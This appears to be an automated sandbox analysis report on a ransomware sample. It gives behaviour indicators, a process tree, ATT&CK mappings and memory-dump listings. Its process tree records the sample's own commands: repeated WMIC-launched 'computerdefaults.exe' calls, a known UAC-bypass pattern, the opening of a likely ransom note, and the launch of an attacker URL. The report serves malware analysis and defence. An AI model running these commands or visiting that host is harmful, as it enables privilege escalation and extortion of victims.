Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{71AFE45E-C254-4EDB-A545-096E96937C1A}"	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4268	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe
4040	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2880	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3952	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2020	MicrosoftEdgeCP.exe
2020	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4040	WerFault.exe
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeShutdownPrivilege	2880	Explorer.EXE
Token: SeCreatePagefilePrivilege	2880	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1176	WMIC.exe
Token: SeSecurityPrivilege	1176	WMIC.exe
Token: SeTakeOwnershipPrivilege	1176	WMIC.exe
Token: SeLoadDriverPrivilege	1176	WMIC.exe
Token: SeSystemProfilePrivilege	1176	WMIC.exe
Token: SeSystemtimePrivilege	1176	WMIC.exe
Token: SeProfSingleProcessPrivilege	1176	WMIC.exe
Token: SeIncBasePriorityPrivilege	1176	WMIC.exe
Token: SeCreatePagefilePrivilege	1176	WMIC.exe
Token: SeBackupPrivilege	1176	WMIC.exe
Token: SeRestorePrivilege	1176	WMIC.exe
Token: SeShutdownPrivilege	1176	WMIC.exe
Token: SeDebugPrivilege	1176	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1176	WMIC.exe
Token: SeRemoteShutdownPrivilege	1176	WMIC.exe
Token: SeUndockPrivilege	1176	WMIC.exe
Token: SeManageVolumePrivilege	1176	WMIC.exe
Token: 33	1176	WMIC.exe
Token: 34	1176	WMIC.exe
Token: 35	1176	WMIC.exe
Token: 36	1176	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1300	WMIC.exe
Token: SeSecurityPrivilege	1300	WMIC.exe
Token: SeTakeOwnershipPrivilege	1300	WMIC.exe
Token: SeLoadDriverPrivilege	1300	WMIC.exe
Token: SeSystemProfilePrivilege	1300	WMIC.exe
Token: SeSystemtimePrivilege	1300	WMIC.exe
Token: SeProfSingleProcessPrivilege	1300	WMIC.exe
Token: SeIncBasePriorityPrivilege	1300	WMIC.exe
Token: SeCreatePagefilePrivilege	1300	WMIC.exe
Token: SeBackupPrivilege	1300	WMIC.exe
Token: SeRestorePrivilege	1300	WMIC.exe
Token: SeShutdownPrivilege	1300	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2880	Explorer.EXE
2832	MicrosoftEdge.exe
2020	MicrosoftEdgeCP.exe
2020	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2880	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 4268	2344	sihost.exe	71
PID 2344 wrote to memory of 4268	2344	sihost.exe	71
PID 2344 wrote to memory of 428	2344	sihost.exe	72
PID 2344 wrote to memory of 428	2344	sihost.exe	72
PID 2344 wrote to memory of 516	2344	sihost.exe	155
PID 2344 wrote to memory of 516	2344	sihost.exe	155
PID 2344 wrote to memory of 640	2344	sihost.exe	74
PID 2344 wrote to memory of 640	2344	sihost.exe	74
PID 640 wrote to memory of 1176	640	cmd.exe	78
PID 640 wrote to memory of 1176	640	cmd.exe	78
PID 516 wrote to memory of 1300	516	ComputerDefaults.exe	79
PID 516 wrote to memory of 1300	516	ComputerDefaults.exe	79
PID 2352 wrote to memory of 1520	2352	svchost.exe	80
PID 2352 wrote to memory of 1520	2352	svchost.exe	80
PID 2352 wrote to memory of 1580	2352	svchost.exe	82
PID 2352 wrote to memory of 1580	2352	svchost.exe	82
PID 1580 wrote to memory of 2400	1580	cmd.exe	84
PID 1580 wrote to memory of 2400	1580	cmd.exe	84
PID 2444 wrote to memory of 2472	2444	taskhostw.exe	89
PID 2444 wrote to memory of 2472	2444	taskhostw.exe	89
PID 2444 wrote to memory of 2584	2444	taskhostw.exe	88
PID 2444 wrote to memory of 2584	2444	taskhostw.exe	88
PID 1520 wrote to memory of 3600	1520	cmd.exe	90
PID 1520 wrote to memory of 3600	1520	cmd.exe	90
PID 2880 wrote to memory of 4516	2880	Explorer.EXE	91
PID 2880 wrote to memory of 4516	2880	Explorer.EXE	91
PID 2880 wrote to memory of 4776	2880	Explorer.EXE	99
PID 2880 wrote to memory of 4776	2880	Explorer.EXE	99
PID 2584 wrote to memory of 4892	2584	cmd.exe	94
PID 2584 wrote to memory of 4892	2584	cmd.exe	94
PID 3568 wrote to memory of 4820	3568	RuntimeBroker.exe	100
PID 3568 wrote to memory of 4820	3568	RuntimeBroker.exe	100
PID 3568 wrote to memory of 4836	3568	RuntimeBroker.exe	103
PID 3568 wrote to memory of 4836	3568	RuntimeBroker.exe	103
PID 2472 wrote to memory of 2936	2472	cmd.exe	106
PID 2472 wrote to memory of 2936	2472	cmd.exe	106
PID 3952 wrote to memory of 4996	3952	Process not Found	107
PID 3952 wrote to memory of 4996	3952	Process not Found	107
PID 3952 wrote to memory of 1184	3952	Process not Found	108
PID 3952 wrote to memory of 1184	3952	Process not Found	108
PID 4516 wrote to memory of 4980	4516	cmd.exe	109
PID 4516 wrote to memory of 4980	4516	cmd.exe	109
PID 4788 wrote to memory of 1236	4788	cmd.exe	110
PID 4788 wrote to memory of 1236	4788	cmd.exe	110
PID 1304 wrote to memory of 4984	1304	cmd.exe	113
PID 1304 wrote to memory of 4984	1304	cmd.exe	113
PID 3952 wrote to memory of 4960	3952	Process not Found	115
PID 3952 wrote to memory of 4960	3952	Process not Found	115
PID 4776 wrote to memory of 832	4776	cmd.exe	114
PID 4776 wrote to memory of 832	4776	cmd.exe	114
PID 3952 wrote to memory of 352	3952	Process not Found	116
PID 3952 wrote to memory of 352	3952	Process not Found	116
PID 4820 wrote to memory of 4492	4820	cmd.exe	118
PID 4820 wrote to memory of 4492	4820	cmd.exe	118
PID 4836 wrote to memory of 1396	4836	cmd.exe	120
PID 4836 wrote to memory of 1396	4836	cmd.exe	120
PID 1516 wrote to memory of 1992	1516	cmd.exe	123
PID 1516 wrote to memory of 1992	1516	cmd.exe	123
PID 1184 wrote to memory of 3756	1184	cmd.exe	124
PID 1184 wrote to memory of 3756	1184	cmd.exe	124
PID 4996 wrote to memory of 3128	4996	cmd.exe	125
PID 4996 wrote to memory of 3128	4996	cmd.exe	125
PID 1392 wrote to memory of 2836	1392	cmd.exe	126
PID 1392 wrote to memory of 2836	1392	cmd.exe	126

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2444
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2584
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4892
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2936

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3860
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3860 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3568
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4492
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1396

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3952
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3128
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3756
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4960
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3284
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:352
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3884
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3600
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2400

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2344
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4268
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://50649e386e7ca270c6eltalkfzj.jobsbig.cam/eltalkfzj^&1^&47095144^&92^&349^&2215063"
  2⤵
  - Checks computer location settings
  PID:428
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:516
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:640
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1176

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4984

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4788
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1236

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1992

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1392
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2836

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1804
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:388

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3728
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4028

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4964
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4364

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4200
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1108

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2704
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4872

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1216
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1036

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:952
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:516

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5004
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:916

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3960
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:644

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4180
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2832

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2020

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:684

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2828

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2344-127-0x000002A43E550000-0x000002A43E554000-memory.dmp

Filesize
16KB

Download
memory/3952-122-0x000002640A930000-0x000002640A931000-memory.dmp

Filesize
4KB

Download
memory/3952-115-0x00000264088C0000-0x00000264088C6000-memory.dmp

Filesize
24KB

Download
memory/3952-116-0x0000026408940000-0x0000026408941000-memory.dmp

Filesize
4KB

Download
memory/3952-117-0x0000026408950000-0x0000026408951000-memory.dmp

Filesize
4KB

Download
memory/3952-118-0x0000026408960000-0x0000026408961000-memory.dmp

Filesize
4KB

Download
memory/3952-120-0x000002640A910000-0x000002640A911000-memory.dmp

Filesize
4KB

Download
memory/3952-126-0x000002640A990000-0x000002640A991000-memory.dmp

Filesize
4KB

Download
memory/3952-155-0x000002640AFB0000-0x000002640AFB1000-memory.dmp

Filesize
4KB

Download
memory/3952-121-0x000002640A920000-0x000002640A921000-memory.dmp

Filesize
4KB

Download
memory/3952-119-0x0000026408970000-0x0000026408971000-memory.dmp

Filesize
4KB

Download
memory/3952-125-0x000002640A980000-0x000002640A981000-memory.dmp

Filesize
4KB

Download
memory/3952-124-0x000002640A970000-0x000002640A971000-memory.dmp

Filesize
4KB

Download
memory/3952-123-0x000002640A960000-0x000002640A961000-memory.dmp

Filesize
4KB

Download